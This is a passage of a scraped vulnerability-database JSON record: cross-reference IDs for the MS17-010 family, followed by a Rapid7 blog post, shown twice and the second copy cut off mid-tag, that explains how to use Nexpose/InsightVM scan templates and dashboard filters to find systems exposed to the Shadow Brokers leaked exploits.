"PACKETSTORM:146236", "PACKETSTORM:142548"]}, {"type": "zdt", "idList": ["1337DAY-ID-33895", "1337DAY-ID-27613", "1337DAY-ID-29702", "1337DAY-ID-27752", "1337DAY-ID-33313", "1337DAY-ID-27786"]}, {"type": "metasploit", "idList": ["MSF:ILITIES/MSFT-CVE-2017-0145/", "MSF:AUXILIARY/ADMIN/SMB/MS17_010_COMMAND", "MSF:EXPLOIT/WINDOWS/SMB/DOUBLEPULSAR_RCE", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE_WIN8", 
"MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE", "MSF:EXPLOIT/WINDOWS/SMB/SMB_DOUBLEPULSAR_RCE", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_PSEXEC", "MSF:ILITIES/MSFT-CVE-2017-0146/", "MSF:AUXILIARY/SCANNER/SMB/SMB_MS17_010"]}, {"type": "nessus", "idList": ["SMB_NT_MS17-010.NASL", "700099.PRM", "700059.PRM", "MS17-010.NASL"]}, {"type": "kaspersky", "idList": ["KLA10977"]}, {"type": "exploitdb", "idList": ["EDB-ID:41987", "EDB-ID:47456", "EDB-ID:41891", "EDB-ID:43970"]}, {"type": "f5", "idList": ["F5:K57181937"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310810698", "OPENVAS:1361412562310810676", "OPENVAS:1361412562310810810"]}, {"type": "mskb", "idList": ["KB4012598", "KB4013389"]}, {"type": "seebug", "idList": ["SSV:92952", "SSV:92964"]}, {"type": "rapid7community", "idList": ["RAPID7COMMUNITY:B91CF4077282454499672A7AD6FBE744", "RAPID7COMMUNITY:4570AAF658D82BF591A6D6AB473704B6", "RAPID7COMMUNITY:761964EB7C8E68AD2D9E6DC0095DF4C0", "RAPID7COMMUNITY:D6095B3BBE1704D4062E19C249D178EC", "RAPID7COMMUNITY:958C8DA808BCCA56E72237E0015ED607", "RAPID7COMMUNITY:3EEFED2F93F50D3C56A51C03A7A3513D", "RAPID7COMMUNITY:8B3AE9E0999C9317B6911ECE10B8A820"]}, {"type": "huawei", "idList": ["HUAWEI-SA-20170513-01-WINDOWS"]}, {"type": "cve", "idList": ["CVE-2017-0144", "CVE-2017-0143", "CVE-2017-0148", "CVE-2017-0147", "CVE-2017-0146", "CVE-2017-0145"]}, {"type": "symantec", "idList": ["SMNTC-96704", "SMNTC-96703", "SMNTC-96706", "SMNTC-96707", "SMNTC-96705", "SMNTC-96709"]}, {"type": "checkpoint_advisories", "idList": ["CPAI-2017-0205", "CPAI-2017-0203", "CPAI-2017-0177", "CPAI-2017-0419", "CPAI-2017-0200", "CPAI-2017-0198"]}, {"type": "kitploit", "idList": ["KITPLOIT:9146046356497464176"]}, {"type": "trendmicroblog", "idList": ["TRENDMICROBLOG:4A07139FC4D015AFBEA9BD27C01BBA37", "TRENDMICROBLOG:F01C658432B4BB0C2F28F1E5CE666104", "TRENDMICROBLOG:657A275464AD59827A9E6C1CD1726546"]}, {"type": "mmpc", "idList": ["MMPC:F3E0CD42C341A30C758CB85AD9F6D052", "MMPC:C211C70545FBDF88C2F99362DC4608A8", 
"MMPC:89789F73D15A0B331512F90F7E692851", "MMPC:F4F919BF0CF7F97FD15CFA500398C7D9", "MMPC:FECB9309EE6D84976C56C12C05F1CD02"]}, {"type": "threatpost", "idList": ["THREATPOST:046D40D1A5114EC07BBA6DB3AE27AA61", "THREATPOST:758CC5987A361EA1BB8BBFFC425334D5", "THREATPOST:D6175B132FE6B7820E744D2387FE7D5D", "THREATPOST:6520102503D39BD2183F4ECDEFA9D591", "THREATPOST:F569DB7301109F1CDBCA30319EA8E2E7"]}, {"type": "canvas", "idList": ["ETERNALBLUE", "MS17_010"]}, {"type": "thn", "idList": ["THN:C50AC2400E56ED88DBA7FC6DAC8360A8", "THN:2E043D9BAC04DEE81005124DD54A31E2", "THN:18A54BDD63D7DC2B3284D326E6510150", "THN:FF56343C15BACA1C1CE83A105EFD7F77", "THN:F12E2167FDA829ED32C7A16A83B048BF"]}, {"type": "qualysblog", "idList": ["QUALYSBLOG:CD2337322AF45A03293696D535E4CBF8", "QUALYSBLOG:B891CB6093D217510DB7327088AE7FB2"]}, {"type": "mscve", "idList": ["MS:CVE-2017-0143", "MS:CVE-2017-0145", "MS:CVE-2017-0148"]}, {"type": "myhack58", "idList": ["MYHACK58:62201786371"]}, {"type": "talosblog", "idList": ["TALOSBLOG:E2BCC6AEFE1A7A25F49757116346A7A6"]}, {"type": "saint", "idList": ["SAINT:DAEC4BA69103823E03C8F3C832C5B41D", "SAINT:BD676E3751A4D110EAA275BF92CA7E46"]}, {"type": "carbonblack", "idList": ["CARBONBLACK:6730D6EB8DF875C002A93DBC78C80B9D"]}, {"type": "nmap", "idList": ["NMAP:SMB-VULN-MS17-010.NSE"]}, {"type": "malwarebytes", "idList": ["MALWAREBYTES:2AA5391DE4E1CAB582414AAD58B623CC"]}], "modified": "2017-05-25T17:57:11", "rev": 2}}, "id": "RAPID7COMMUNITY:9E4E3C72C90426CECD1801D8F0006388", "objectVersion": "1.5", "title": "Vulnerability Management Tips for the Shadow Brokers Leaked Exploits", "bulletinFamily": "blog", "viewCount": 184, "reporter": "Ken Mizota", "references": [], "enchantments_done": [], "type": "rapid7community", "_object_type": "robots.models.rss.RssBulletin", "history": [{"lastseen": "2017-05-09T14:47:56", "bulletin": {"published": "2017-05-09T14:06:06", "enchantments": {}, "id": "RAPID7COMMUNITY:9E4E3C72C90426CECD1801D8F0006388", "objectVersion": "1.4", "title": 
"Vulnerability Management Tips for the Shadow Brokers Leaked Exploits", "bulletinFamily": "blog", "viewCount": 32, "reporter": "Ken Mizota", "references": [], "type": "rapid7community", "history": [], "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "description": "<!-- [DocumentBodyStart:09493b2e-1b09-410b-94f5-219d718e7ddf] --><div class=\"jive-rendered-content\"><p><a class=\"jive-link-profile-small jiveTT-hover-user\" data-containerId=\"-1\" data-containerType=\"-1\" data-objectId=\"30294\" data-objectType=\"3\" href=\"https://community.rapid7.com/people/pdxbek\">Rebekah Brown</a> and the Rapid7 team have delivered a spot-on breakdown of the recent Shadow Brokers exploit and tool release. Before you read any further, if you haven&#8217;t done so already, please <a class=\"jive-link-blog-small\" data-containerId=\"5165\" data-containerType=\"37\" data-objectId=\"7842\" data-objectType=\"38\" href=\"https://community.rapid7.com/community/infosec/blog/2017/04/18/the-shadow-brokers-leaked-exploits-faq\">read her post</a>. It&#8217;s probably not the only post you&#8217;ve read on this topic, but it is cogent, well-constructed and worth the 5 minutes.</p><p style=\"min-height: 8pt; padding: 0px;\">&#160;</p><p>Back with me? With all of the media attention and discussion in the infosec community, it would not surprise me to hear that a security team still wondered aloud: &ldquo;Nation-state intrigue makes for scintillating reading, but what do I do with this news?&#8221;</p><p style=\"min-height: 8pt; padding: 0px;\">&#160;</p><p>So long as there are attackers and defenders in infosec, the Rapid7 community continues to be on the front lines of the struggle. But, in such a position, which action is prudent? 
Purchasing an underground bunker outright may not be a sound decision for you.&#160; However, there are practical actions you can take.</p><p style=\"min-height: 8pt; padding: 0px;\">&#160;</p><h2>Don't waste a learning moment</h2><p>You invest in building and maintaining your <a class=\"jive-link-external-small\" href=\"https://community.rapid7.com/external-link.jspa?url=https%3A%2F%2Fwww.rapid7.com%2Fsolutions%2Fvulnerability-management%2F\" target=\"_blank\">vulnerability management program</a>. This includes making sure you have visibility to the latest threats and perhaps <a class=\"jive-link-blog-small\" data-containerId=\"1004\" data-containerType=\"37\" data-objectId=\"7752\" data-objectType=\"38\" href=\"https://community.rapid7.com/community/nexpose/blog/2016/12/19/giving-the-gift-of-time-nexpose-adaptive-security-improvements\">automating your response</a>. The exploits thrust onto the world stage by the Shadow Brokers, while newsworthy, distill down to a seemingly normal set of patches and updates. 
As Rebekah's post states:</p><blockquote class=\"jive-quote\"><p dir=\"ltr\"><span style=\"font-family: arial, helvetica, sans-serif;\"><span style=\"font-size: 12pt; color: #000000;\">I</span><span style=\"font-size: 12pt; color: #000000;\">f you are unsure if you are up to date on these patches, we have checks for all of them in</span><a class=\"jive-link-external-small\" href=\"https://community.rapid7.com/external-link.jspa?url=https%3A%2F%2Fwww.rapid7.com%2Fproducts%2Fnexpose%2F\" target=\"_blank\"><span style=\"font-size: 12pt; color: #000000;\"> </span><span style=\"font-size: 12pt; color: #1155cc;\">Rapid7 Nexpose</span></a><span style=\"font-size: 12pt; color: #000000;\"> and</span><a class=\"jive-link-external-small\" href=\"https://community.rapid7.com/external-link.jspa?url=https%3A%2F%2Fwww.rapid7.com%2Fproducts%2Finsightvm%2F\" target=\"_blank\"><span style=\"font-size: 12pt; color: #000000;\"> </span><span style=\"font-size: 12pt; color: #1155cc;\">Rapid7 InsightVM</span></a><span style=\"font-size: 12pt; color: #000000;\">. These checks are all included in the </span><span style=\"font-size: 12pt; color: #000000;\">Microsoft Hotfix</span><span style=\"font-size: 12pt; color: #000000;\"> scan template.</span><span style=\"font-size: 12pt; color: #000000;\"> </span></span></p></blockquote><p>It turns out, if you&#8217;re maintaining your <a class=\"jive-link-external-small\" href=\"https://community.rapid7.com/external-link.jspa?url=https%3A%2F%2Fwww.rapid7.com%2Ffundamentals%2Fvulnerability-management-and-scanning%2F\" target=\"_blank\">vulnerability scans</a>, and getting the visibility to your Windows assets, you already have the visibility you need. 
But that doesn&#8217;t mean you have to treat this event as business as usual.&#160; Perhaps you&#8217;d like to see how your security program fares when up against the vaunted Shadow Brokers trove?</p><p style=\"min-height: 8pt; padding: 0px;\">&#160;</p><p>Here are a few ideas you can try based on a mix of newer and long-standing capabilities.</p><p style=\"min-height: 8pt; padding: 0px;\">&#160;</p><h2>Look for what you need</h2><p>If you want to efficiently identify the presence of the Shadow Brokers&#8217; leaked vulnerabilities, and you don&#8217;t want to change your existing Scan regime, create a new Scan template.</p><p style=\"min-height: 8pt; padding: 0px;\">&#160;</p><p>You&#8217;ll find the option to create a new <a class=\"jive-link-external-small\" href=\"https://community.rapid7.com/external-link.jspa?url=https%3A%2F%2Fhelp.rapid7.com%2Finsightvm%2Fen-us%2F%23Files%2FWorking_with_scan_templates_and_tuning_scan_performance.html\" rel=\"nofollow\" target=\"_blank\">Scan Template</a> in the Administration tab. Start off by naming your template:</p><p><span style=\"font-size: 12pt; font-family: Calibri; color: #000000;\"> <span style=\"color: #000000; font-size: 12pt; font-family: Calibri;\"><a href=\"https://lh5.googleusercontent.com/w2cWnRYjmkut-uz1wJOJ7yd0KrAK9cwf279I7Q_0msO0nYW1e9R1Xw4ZDKm40vupD5hUuP2oBncdoptB6R7QEVVoLrP8hQZur332gw2ST1gRb15N4cMa1QN4zMhVQY4bzdSBOsL6\"><img class=\"jive-image\" height=\"217\" src=\"https://lh5.googleusercontent.com/w2cWnRYjmkut-uz1wJOJ7yd0KrAK9cwf279I7Q_0msO0nYW1e9R1Xw4ZDKm40vupD5hUuP2oBncdoptB6R7QEVVoLrP8hQZur332gw2ST1gRb15N4cMa1QN4zMhVQY4bzdSBOsL6\" style=\"border-style: none;\" width=\"402\"/></a></span></span></p><p>Next, configure your Scan Template for specific vulnerability checks. 
Tailor your template by looking only for the checks associated with the CVEs exploited by the Shadow Brokers leak.</p><p style=\"min-height: 8pt; padding: 0px;\">&#160;</p><div class=\"j-rte-table\"><table style=\"border: none;\"><tbody><tr><td style=\"border: none;border: solid #000000 1pt;padding: 5pt 5pt 5pt 5pt;\"><p dir=\"ltr\" style=\"margin-bottom: 2pt;\"><span style=\"font-size: 10pt; font-family: Arial; color: #000000;\">EternalBlue</span></p><p dir=\"ltr\" style=\"margin-bottom: 2pt;\"><span style=\"font-size: 10pt; font-family: Arial; color: #000000;\">EternalSynergy</span></p><p dir=\"ltr\" style=\"margin-bottom: 2pt;\"><span style=\"font-size: 10pt; font-family: Arial; color: #000000;\">EternalRomance</span></p><p dir=\"ltr\" style=\"margin-bottom: 2pt;\"><span style=\"font-size: 10pt; font-family: Arial; color: #000000;\">EternalChampion</span></p></td><td style=\"border: none;border: solid #000000 1pt;padding: 5pt 5pt 5pt 5pt;\"><p dir=\"ltr\" style=\"margin-bottom: 2pt;\"><span style=\"font-size: 10pt; font-family: Arial; color: #000000;\">MS17-010</span></p></td><td style=\"border: none;border: solid #000000 1pt;padding: 5pt 5pt 5pt 5pt;\"><p dir=\"ltr\" style=\"margin-bottom: 2pt;\"><span style=\"font-size: 10pt; font-family: Arial; color: #000000;\">msft-cve-2017-0143</span></p><p dir=\"ltr\" style=\"margin-bottom: 2pt;\"><span style=\"font-size: 10pt; font-family: Arial; color: #000000;\">msft-cve-2017-0144</span></p><p dir=\"ltr\" style=\"margin-bottom: 2pt;\"><span style=\"font-size: 10pt; font-family: Arial; color: #000000;\">msft-cve-2017-0145</span></p><p dir=\"ltr\" style=\"margin-bottom: 2pt;\"><span style=\"font-size: 10pt; font-family: Arial; color: #000000;\">msft-cve-2017-0146</span></p><p dir=\"ltr\" style=\"margin-bottom: 2pt;\"><span style=\"font-size: 10pt; font-family: Arial; color: #000000;\">msft-cve-2017-0147</span></p><p dir=\"ltr\" style=\"margin-bottom: 2pt;\"><span style=\"font-size: 10pt; font-family: Arial; color: 
#000000;\">msft-cve-2017-0148</span></p></td></tr><tr><td style=\"border: none;border: solid #000000 1pt;padding: 5pt 5pt 5pt 5pt;\"><p dir=\"ltr\" style=\"margin-bottom: 2pt;\"><span style=\"font-size: 10pt; font-family: Arial; color: #000000;\">EmeraldThread</span></p></td><td style=\"border: none;border: solid #000000 1pt;padding: 5pt 5pt 5pt 5pt;\"><p dir=\"ltr\" style=\"margin-bottom: 2pt;\"><span style=\"font-size: 10pt; font-family: Arial; color: #000000;\">MS10-061</span></p></td><td style=\"border: none;border: solid #000000 1pt;padding: 5pt 5pt 5pt 5pt;\"><p dir=\"ltr\" style=\"margin-bottom: 2pt;\"><span style=\"font-size: 10pt; font-family: Arial; color: #000000;\">WINDOWS-HOTFIX-MS10-061</span></p></td></tr><tr><td style=\"border: none;border: solid #000000 1pt;padding: 5pt 5pt 5pt 5pt;\"><p dir=\"ltr\" style=\"margin-bottom: 2pt;\"><span style=\"font-size: 10pt; font-family: Arial; color: #000000;\">EskimoRoll</span></p></td><td style=\"border: none;border: solid #000000 1pt;padding: 5pt 5pt 5pt 5pt;\"><p dir=\"ltr\" style=\"margin-bottom: 2pt;\"><span style=\"font-size: 10pt; font-family: Arial; color: #000000;\">MS14-068</span></p></td><td style=\"border: none;border: solid #000000 1pt;padding: 5pt 5pt 5pt 5pt;\"><p dir=\"ltr\" style=\"margin-bottom: 2pt;\"><span style=\"font-size: 10pt; font-family: Arial; color: #000000;\">WINDOWS-HOTFIX-MS14-068</span></p></td></tr><tr><td style=\"border: none;border: solid #000000 1pt;padding: 5pt 5pt 5pt 5pt;\"><p dir=\"ltr\" style=\"margin-bottom: 2pt;\"><span style=\"font-size: 10pt; font-family: Arial; color: #000000;\">EducatedScholar</span></p></td><td style=\"border: none;border: solid #000000 1pt;padding: 5pt 5pt 5pt 5pt;\"><p dir=\"ltr\" style=\"margin-bottom: 2pt;\"><span style=\"font-size: 10pt; font-family: Arial; color: #000000;\">MS09-050</span></p></td><td style=\"border: none;border: solid #000000 1pt;padding: 5pt 5pt 5pt 5pt;\"><p dir=\"ltr\" style=\"margin-bottom: 2pt;\"><span 
style=\"font-size: 10pt; font-family: Arial; color: #000000;\">WINDOWS-HOTFIX-MS09-050</span></p></td></tr><tr><td style=\"border: none;border: solid #000000 1pt;padding: 5pt 5pt 5pt 5pt;\"><p dir=\"ltr\" style=\"margin-bottom: 2pt;\"><span style=\"font-size: 10pt; font-family: Arial; color: #000000;\">EclipsedWing</span></p></td><td style=\"border: none;border: solid #000000 1pt;padding: 5pt 5pt 5pt 5pt;\"><p dir=\"ltr\" style=\"margin-bottom: 2pt;\"><span style=\"font-size: 10pt; font-family: Arial; color: #000000;\">MS08-067</span></p></td><td style=\"border: none;border: solid #000000 1pt;padding: 5pt 5pt 5pt 5pt;\"><p dir=\"ltr\" style=\"margin-bottom: 2pt;\"><span style=\"font-size: 10pt; font-family: Arial; color: #000000;\">WINDOWS-HOTFIX-MS08-067</span></p></td></tr></tbody></table></div><h4></h4><p>Use the CVEs to <a class=\"jive-link-external-small\" href=\"https://community.rapid7.com/external-link.jspa?url=https%3A%2F%2Fhelp.rapid7.com%2Finsightvm%2Fen-us%2F%23Files%2FSelecting_vulnerability_checks.html\" rel=\"nofollow\" target=\"_blank\">search for the checks and add to your template</a>. 
Here, I&#8217;ve added CVE-2017-0144.</p><p><span style=\"font-size: 12pt; font-family: Calibri; color: #000000;\"> <span style=\"color: #000000; font-size: 12pt; font-family: Calibri;\"><a href=\"https://lh4.googleusercontent.com/5Z0ECaIK5CvJkbzc0EeqtJVB0VtNTY6uY6oqWn2rxSVKAWOhn7bGytddgRLkfJof5Rg8mqY5lWTqSPZrHB9vwlZiRsseBjBrbjAaD1yIjMQLYPqR1T_cwMgkKYyXxyr0vCSso1sJ\"><img class=\"jive-image\" height=\"111\" src=\"https://lh4.googleusercontent.com/5Z0ECaIK5CvJkbzc0EeqtJVB0VtNTY6uY6oqWn2rxSVKAWOhn7bGytddgRLkfJof5Rg8mqY5lWTqSPZrHB9vwlZiRsseBjBrbjAaD1yIjMQLYPqR1T_cwMgkKYyXxyr0vCSso1sJ\" style=\"border-style: none;\" width=\"446\"/></a></span></span></p><p style=\"min-height: 8pt; padding: 0px;\">&#160;</p><p>Now that you&#8217;ve got one template squared away, you can take your new Scan Template out for a spin on an entire Site, or an ad hoc scan, or you might want to check out <a class=\"jive-link-blog-small\" data-containerId=\"1004\" data-containerType=\"37\" data-objectId=\"7778\" data-objectType=\"38\" href=\"https://community.rapid7.com/community/nexpose/blog/2017/01/25/scan-configuration-improvements-in-nexpose\">improvements to Scan Configuration</a> to target a scan for just the subset of a Site.</p><p style=\"min-height: 8pt; padding: 0px;\">&#160;</p><p>If you don&#8217;t have time for manual scans, create an <a class=\"jive-link-blog-small\" data-containerId=\"1004\" data-containerType=\"37\" data-objectId=\"7261\" data-objectType=\"38\" href=\"https://community.rapid7.com/community/nexpose/blog/2015/10/08/nexpose-60-new-feature-adaptive-security\">Automated Action</a> to scan an asset when it is discovered on your network. 
Whether you&#8217;ve discovered the asset via DHCP discovery connection or just by a regular discovery scan, you can use Automated Actions to scan the Asset when it appears.</p><p style=\"min-height: 8pt; padding: 0px;\">&#160;</p><h2>Give your stakeholders a view</h2><p>I couldn&#8217;t leave you without one final tried and true tip for satisfying demanding executive stakeholders: You can always create a new dashboard!</p><p style=\"min-height: 8pt; padding: 0px;\">&#160;</p><p>I&#8217;ve created a custom Shadow Brokers Leak dashboard to house all the cards and analysis I&#8217;ll need.</p><p dir=\"ltr\"><span style=\"color: #000000; font-size: 12pt; font-family: Calibri;\"><a href=\"https://lh3.googleusercontent.com/rCKJqi42hnHGN0eHvwZLi2i7GtVki2y4fiyziNQ4XVAJQNIBPk-wabf5qeT77p9SHA9E-z4W8nRsJUVakr8pN-EKAvn0XuRXJ9QCr3YY0ka2fC3kC2ivtBYv_s-UJ5qesrqbnr70\"><img class=\"jive-image\" height=\"308\" src=\"https://lh3.googleusercontent.com/rCKJqi42hnHGN0eHvwZLi2i7GtVki2y4fiyziNQ4XVAJQNIBPk-wabf5qeT77p9SHA9E-z4W8nRsJUVakr8pN-EKAvn0XuRXJ9QCr3YY0ka2fC3kC2ivtBYv_s-UJ5qesrqbnr70\" style=\"border-style: none;\" width=\"324\"/></a></span></p><p>Next, I&#8217;ll start adding Cards that I&#8217;d like to work with. Let&#8217;s use the Newly Discovered Assets card as a starting point. 
I&#8217;ve added this card to my Dashboard and I&#8217;ll click Expand Card to drill in.</p><p dir=\"ltr\"><span style=\"color: #000000; font-size: 12pt; font-family: Calibri;\"><a href=\"https://lh6.googleusercontent.com/HgDK-qtwwkzlYf_Rftb-Thg6OwZiAG-GGFpLnjBR_3394Sid6zCXTlJS5quliFtkVJGqH4cSpV6BjdEDtc147nacnPnaSsMA9OyLhwBzB_VUdmyiUpGcp6nn7Ghi0eotxscQCh4V\"><img class=\"jive-image\" height=\"266\" src=\"https://lh6.googleusercontent.com/HgDK-qtwwkzlYf_Rftb-Thg6OwZiAG-GGFpLnjBR_3394Sid6zCXTlJS5quliFtkVJGqH4cSpV6BjdEDtc147nacnPnaSsMA9OyLhwBzB_VUdmyiUpGcp6nn7Ghi0eotxscQCh4V\" style=\"border-style: none;\" width=\"197\"/></a></span></p><p>Next, I&#8217;ll create a new filter to look only for Assets that are affected by the CVEs and hotfixes identified above (note that EskimoRoll maps to MS14-068, as in the table above, so the filter must match on ms14-068). I&#8217;ll paste this into the Filter field:</p><blockquote class=\"jive-quote\"><p dir=\"ltr\"><span style=\"font-size: 12pt; font-family: Calibri; color: #000000;\">asset.vulnerability.title CONTAINS \"cve-2017-0143\" OR asset.vulnerability.title CONTAINS \"cve-2017-0144\" OR asset.vulnerability.title CONTAINS \"cve-2017-0145\" OR asset.vulnerability.title CONTAINS \"cve-2017-0146\" OR asset.vulnerability.title CONTAINS \"cve-2017-0147\" OR asset.vulnerability.title CONTAINS \"cve-2017-0148\" OR asset.vulnerability.title CONTAINS \"ms10-061\" OR asset.vulnerability.title CONTAINS \"ms14-068\" OR asset.vulnerability.title CONTAINS \"ms09-050\" OR asset.vulnerability.title CONTAINS \"ms08-067\" OR asset.vulnerability.title CONTAINS \"ms17-010\"</span></p></blockquote><p>It&#8217;ll look something like this:</p><p><span style=\"font-size: 11pt; font-family: Calibri; color: #212121;\"><span style=\"color: #212121; font-size: 11pt; font-family: Calibri;\"><a href=\"https://lh6.googleusercontent.com/BTn2iv4o1PqZZm5A2Y4HtDCX7Q2p9h5MNkNr1gxi_OPYL1dgDlLgk1QmU3lTeYzDdjzd9a5eVEfBcsTv70Yb5F9LqZGVoqNI2kobfXHBLzKfvqVfzsYaekrRqUz5vi2l06Ro9AK6\"><img class=\"jive-image\" height=\"132\" 
src=\"https://lh6.googleusercontent.com/BTn2iv4o1PqZZm5A2Y4HtDCX7Q2p9h5MNkNr1gxi_OPYL1dgDlLgk1QmU3lTeYzDdjzd9a5eVEfBcsTv70Yb5F9LqZGVoqNI2kobfXHBLzKfvqVfzsYaekrRqUz5vi2l06Ro9AK6\" style=\"border-style: none;\" width=\"624\"/></a></span> </span></p><p>I&#8217;ve saved this filter so I can use it across any number of cards I wish. Since I&#8217;ve done the work of creating the filter once, it is straightforward to add cards, apply the filter, and then save the Cards to my dashboard. I&#8217;ve built a tailored view, showing the impact of the Shadow Brokers leaked exploits on my organization.</p><p style=\"min-height: 8pt; padding: 0px;\">&#160;</p><p dir=\"ltr\"><span style=\"color: #212121; font-size: 11pt; font-family: Calibri;\"><a href=\"https://lh5.googleusercontent.com/LnU1nAPZkU1kmsVijrIaWw4MTrnnwXFDNnKq7_1l5FkhfsjdFUkCCtdghTBdypw9s3XhOKI4KtDILRz4_2qBBGRAnB3zX6i5G5G9ZevqDffx8Fz7nCUkhe8uFg05JcAqjPBF9yMN\"><img class=\"jive-image\" height=\"379\" src=\"https://lh5.googleusercontent.com/LnU1nAPZkU1kmsVijrIaWw4MTrnnwXFDNnKq7_1l5FkhfsjdFUkCCtdghTBdypw9s3XhOKI4KtDILRz4_2qBBGRAnB3zX6i5G5G9ZevqDffx8Fz7nCUkhe8uFg05JcAqjPBF9yMN\" style=\"border-style: none;\" width=\"624\"/></a></span></p><p style=\"min-height: 8pt; padding: 0px;\">&#160;</p><p>If you&#8217;re feeling comfortable with this approach, take a step futher! Try out an <a class=\"jive-link-blog-small\" data-containerId=\"1004\" data-containerType=\"37\" data-objectId=\"7838\" data-objectType=\"38\" href=\"https://community.rapid7.com/community/nexpose/blog/2017/04/24/actionable-remediation-projects\">Actionable Remediation Project</a> from here and get started taking down these risks on your turf.</p><p style=\"min-height: 8pt; padding: 0px;\">&#160;</p><p>Not a customer of ours? 
<a class=\"jive-link-external-small\" href=\"https://community.rapid7.com/external-link.jspa?url=https%3A%2F%2Fwww.rapid7.com%2Fproducts%2Finsightvm%2Fdownload%2F\" target=\"_blank\">Try a free 30-day trial of InsightVM here</a>.</p><h4></h4></div><!-- [DocumentBodyEnd:09493b2e-1b09-410b-94f5-219d718e7ddf] -->", "cvelist": ["CVE-2017-0144", "CVE-2017-0148", "CVE-2017-0147", "CVE-2017-0146", "CVE-2017-0143", "CVE-2017-0145"], "href": "https://community.rapid7.com/community/nexpose/blog/2017/05/09/practical-vm-tips-for-the-shadow-brokers-leaked-exploits", "modified": "2017-05-09T14:06:06", "lastseen": "2017-05-09T14:47:56"}, "differentElements": ["description", "published", "modified"], "edition": 1}], "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "description": "<!-- [DocumentBodyStart:f67c4b5d-4e9f-4a32-a187-cc604c412a04] --><div class=\"jive-rendered-content\"><p><a class=\"jive-link-profile-small jiveTT-hover-user\" data-containerId=\"-1\" data-containerType=\"-1\" data-objectId=\"30294\" data-objectType=\"3\" href=\"https://community.rapid7.com/people/pdxbek\">Rebekah Brown</a> and the Rapid7 team have delivered a spot-on breakdown of the recent Shadow Brokers exploit and tool release. Before you read any further, if you haven&#8217;t done so already, please <a class=\"jive-link-blog-small\" data-containerId=\"5165\" data-containerType=\"37\" data-objectId=\"7842\" data-objectType=\"38\" href=\"https://community.rapid7.com/community/infosec/blog/2017/04/18/the-shadow-brokers-leaked-exploits-faq\">read her post</a>. It&#8217;s probably not the only post you&#8217;ve read on this topic, but it is cogent, well-constructed and worth the 5 minutes.</p><p style=\"min-height: 8pt; padding: 0px;\">&#160;</p><p>Back with me? 
With all of the media attention and discussion in the infosec community, it would not surprise me to hear that a security team still wondered aloud: &ldquo;Nation-state intrigue makes for scintillating reading, but what do I do with this news?&#8221;</p><p style=\"min-height: 8pt; padding: 0px;\">&#160;</p><p>So long as there are attackers and defenders in infosec, the Rapid7 community continues to be on the front lines of the struggle. But, in such a position, which action is prudent? Purchasing an underground bunker outright may not be a sound decision for you.&#160; However, there are practical actions you can take.</p><p style=\"min-height: 8pt; padding: 0px;\">&#160;</p><h2>Don't waste a learning moment</h2><p>You invest in building and maintaining your <a class=\"jive-link-external-small\" href=\"https://community.rapid7.com/external-link.jspa?url=https%3A%2F%2Fwww.rapid7.com%2Fsolutions%2Fvulnerability-management%2F\" target=\"_blank\">vulnerability management program</a>. This includes making sure you have visibility to the latest threats and perhaps <a class=\"jive-link-blog-small\" data-containerId=\"1004\" data-containerType=\"37\" data-objectId=\"7752\" data-objectType=\"38\" href=\"https://community.rapid7.com/community/nexpose/blog/2016/12/19/giving-the-gift-of-time-nexpose-adaptive-security-improvements\">automating your response</a>. The exploits thrust onto the world stage by the Shadow Brokers, while newsworthy, distill down to a seemingly normal set of patches and updates. 
As Rebekah's post states:</p><blockquote class=\"jive-quote\"><p dir=\"ltr\"><span style=\"font-family: arial, helvetica, sans-serif;\"><span style=\"font-size: 12pt; color: #000000;\">I</span><span style=\"font-size: 12pt; color: #000000;\">f you are unsure if you are up to date on these patches, we have checks for all of them in</span><a class=\"jive-link-external-small\" href=\"https://community.rapid7.com/external-link.jspa?url=https%3A%2F%2Fwww.rapid7.com%2Fproducts%2Fnexpose%2F\" target=\"_blank\"><span style=\"font-size: 12pt; color: #000000;\"> </span><span style=\"font-size: 12pt; color: #1155cc;\">Rapid7 Nexpose</span></a><span style=\"font-size: 12pt; color: #000000;\"> and</span><a class=\"jive-link-external-small\" href=\"https://community.rapid7.com/external-link.jspa?url=https%3A%2F%2Fwww.rapid7.com%2Fproducts%2Finsightvm%2F\" target=\"_blank\"><span style=\"font-size: 12pt; color: #000000;\"> </span><span style=\"font-size: 12pt; color: #1155cc;\">Rapid7 InsightVM</span></a><span style=\"font-size: 12pt; color: #000000;\">. These checks are all included in the </span><span style=\"font-size: 12pt; color: #000000;\">Microsoft Hotfix</span><span style=\"font-size: 12pt; color: #000000;\"> scan template.</span><span style=\"font-size: 12pt; color: #000000;\"> </span></span></p></blockquote><p>It turns out, if you&#8217;re maintaining your <a class=\"jive-link-external-small\" href=\"https://community.rapid7.com/external-link.jspa?url=https%3A%2F%2Fwww.rapid7.com%2Ffundamentals%2Fvulnerability-management-and-scanning%2F\" target=\"_blank\">vulnerability scans</a>, and getting the visibility to your Windows assets, you already have the visibility you need. 
But that doesn&#8217;t mean you have to treat this event as business as usual.&#160; Perhaps you&#8217;d like to see how your security program fares when up against the vaunted Shadow Brokers trove?</p><p style=\"min-height: 8pt; padding: 0px;\">&#160;</p><p>Here are a few ideas you can try based on a mix of newer and long-standing capabilities.</p><p style=\"min-height: 8pt; padding: 0px;\">&#160;</p><h2>Look for what you need</h2><p>If you want to efficiently identify the presence of the Shadow Brokers&#8217; leaked vulnerabilities, and you don&#8217;t want to change your existing Scan regime, create a new Scan template.</p><p style=\"min-height: 8pt; padding: 0px;\">&#160;</p><p>You&#8217;ll find creating a new <a class=\"jive-link-external-small\" href=\"https://community.rapid7.com/external-link.jspa?url=https%3A%2F%2Fhelp.rapid7.com%2Finsightvm%2Fen-us%2F%23Files%2FWorking_with_scan_templates_and_tuning_scan_performance.html\" rel=\"nofollow\" target=\"_blank\">Scan Template</a> in the Administration tab. Start off by naming your template:</p><p><span style=\"font-size: 12pt; font-family: Calibri; color: #000000;\"> <span style=\"color: #000000; font-size: 12pt; font-family: Calibri;\"><a 